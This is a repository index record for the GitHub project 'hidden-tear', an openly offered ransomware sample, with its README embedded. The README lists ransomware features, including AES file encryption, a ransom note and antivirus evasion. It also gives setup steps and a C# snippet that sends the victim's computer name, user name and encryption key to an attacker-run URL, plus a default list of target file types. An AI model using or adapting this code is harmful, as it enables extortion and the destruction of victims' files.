{"id":13700311,"url":"https://github.com/goliate/hidden-tear","last_synced_at":"2025-05-04T18:34:54.339Z","repository":{"id":36717619,"uuid":"41024186","full_name":"goliate/hidden-tear","owner":"goliate","description":"ransomware  open-sources","archived":false,"fork":false,"pushed_at":"2020-07-08T22:34:01.000Z","size":256,"stargazers_count":728,"open_issues_count":10,"forks_count":389,"subscribers_count":53,"default_branch":"master","last_synced_at":"2024-11-13T06:33:20.264Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/goliate.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-08-19T09:06:51.000Z","updated_at":"2024-11-12T02:10:13.000Z","dependencies_parsed_at":"2022-07-11T10:52:50.332Z","dependency_job_id":null,"html_url":"https://github.com/goliate/hidden-tear","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/goliate%2Fhidden-tear","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/goliate%2Fhidden-tear/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/goliate%2Fhidden-tear/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/goliate%2Fhidden-tear/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/goliate","download_url":"https://codeload.github.com/goliate/hidden-tear/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252383154,"owners_count":21739283,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T20:00:54.100Z","updated_at":"2025-05-04T18:34:49.314Z","avatar_url":"https://github.com/goliate.png","language":"C#","readme":"         _     _     _     _              _                  \n        | |   (_)   | |   | |            | |                 \n        | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ \n        | '_ \\| |/ _` |/ _` |/ _ \\ '_ \\  | __/ _ \\/ _` | '__|\n        | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   \n        |_| |_|_|\\__,_|\\__,_|\\___|_| |_|  \\__\\___|\\__,_|_|   \n                                                     \nIt's a ransomware-like file crypter sample which can be modified for specific purposes. \n\n**Features**\n* Uses AES algorithm to encrypt files.\n* Sends encryption key to a server.\n* Encrypted files can be decrypt in decrypter program with encryption key.\n* Creates a text file in Desktop with given message.\n* Small file size (12 KB)\n* Doesn't detected to antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt\n\n**Demonstration Video**\n\nhttps://www.youtube.com/watch?v=LtiRISepIfs\n\n**Usage**\n\n* You need to have a web server which supports scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping)\n\n  `string targetURL = \"https://www.example.com/hidden-tear/write.php?info=\";`\n\n* The script should writes the GET parameter to a text file. Sending process running in `SendPassword()` function\n\n  ```\n  string info = computerName + \"-\" + userName + \" \" + password;\n  var fullUrl = targetURL + info;\n  var conent = new System.Net.WebClient().DownloadString(fullUrl);\n  \n  ```\n* Target file extensions can be change. Default list:\n\n```\nvar validExtensions = new[]{\".txt\", \".doc\", \".docx\", \".xls\", \".xlsx\", \".ppt\", \".pptx\", \".odt\", \".jpg\", \".png\", \".csv\", \".sql\", \".mdb\", \".sln\", \".php\", \".asp\", \".aspx\", \".html\", \".xml\", \".psd\"};\n```\n**Legal Warning** \n\nWhile this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.\n","funding_links":[],"categories":[":tophat: Hacking","Malware Analysis"],"sub_categories":["Ransomware","Ransomwares"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgoliate%2Fhidden-tear","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgoliate%2Fhidden-tear","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgoliate%2Fhidden-tear/lists"}